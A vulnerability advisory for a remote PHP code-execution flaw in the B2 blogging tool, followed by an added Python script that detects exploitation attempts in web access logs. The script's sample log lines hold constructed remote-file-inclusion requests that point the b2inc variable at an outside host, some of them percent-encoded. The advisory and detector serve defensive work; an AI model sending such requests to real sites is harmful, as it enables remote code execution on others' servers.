PT-2002-1755 · B2 · B2

Published: 2002-08-12 · Updated: 2008-09-05 · CVE-2002-0734

CVSS v2.0: 7.5 (High)

Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
Name of the Vulnerable Software and Affected Versions

B2 versions 2.0.6pre2 and earlier

Description

The issue arises from the improper loading of the b2config.php file in certain configurations by the b2edit.showposts.php script. This allows remote attackers to execute arbitrary PHP code by manipulating the $b2inc variable to point to a malicious program stored on a remote server.

Recommendations

For B2 versions 2.0.6pre2 and earlier, ensure the b2config.php file is properly loaded and secured to prevent remote attackers from manipulating the $b2inc variable. Consider restricting access to the b2edit.showposts.php script until a proper fix is applied. At the moment, there is no information about a newer version that contains a fix for this vulnerability.
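One way to look for attempts against this issue in web-server access logs (an added example, not code from this advisory or from the B2 project): it reports every request that supplies `b2inc` itself and marks the ones whose value is a remote URL. It assumes combined-log-format lines and that the variable arrives as a query-string parameter named `b2inc`; the function name and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines; addresses, hosts and paths are placeholders.
SAMPLE_LOG = """\
192.0.2.10 - - [12/Aug/2002:10:01:02 +0000] "GET /blog/b2edit.showposts.php?posts=10 HTTP/1.0" 200 5120
192.0.2.77 - - [12/Aug/2002:10:03:44 +0000] "GET /blog/b2edit.showposts.php?b2inc=http://files.example.net/inc HTTP/1.0" 200 311
192.0.2.77 - - [12/Aug/2002:10:03:50 +0000] "GET /blog/b2edit.showposts.php?b2inc=%66tp%3A%2F%2Ffiles.example.net%2Finc HTTP/1.0" 200 311
192.0.2.15 - - [12/Aug/2002:10:05:09 +0000] "GET /blog/index.php?b2inc=b2-include HTTP/1.0" 200 4096
"""

# Client address and request target from a combined-log-format line.
REQUEST = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*"')
# A value that starts with a URL scheme (http://, ftp://, ...) points off-host.
SCHEME = re.compile(r'^[a-z][a-z0-9+.-]*://', re.I)


def find_b2inc_overrides(log_text):
    """Return one record per request that sets b2inc from the query string.

    b2inc is an include path the application is meant to set itself, so any
    request-supplied value is worth reviewing; 'remote' marks URL values.
    """
    hits = []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue  # not a parsable request line
        client, target = m.groups()
        url = urlsplit(target)
        # parse_qsl percent-decodes, so encoded schemes are still recognised.
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            if name != "b2inc":  # PHP variable names are case-sensitive
                continue
            hits.append({
                "client": client,
                "script": url.path.rsplit("/", 1)[-1],
                "value": value,
                "remote": bool(SCHEME.match(value)),
            })
    return hits


if __name__ == "__main__":
    for hit in find_b2inc_overrides(SAMPLE_LOG):
        print(hit)
```

Parameters sent in a POST body do not appear in access logs, so this covers query-string requests only.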


Related identifiers

CVE-2002-0734

Affected products

B2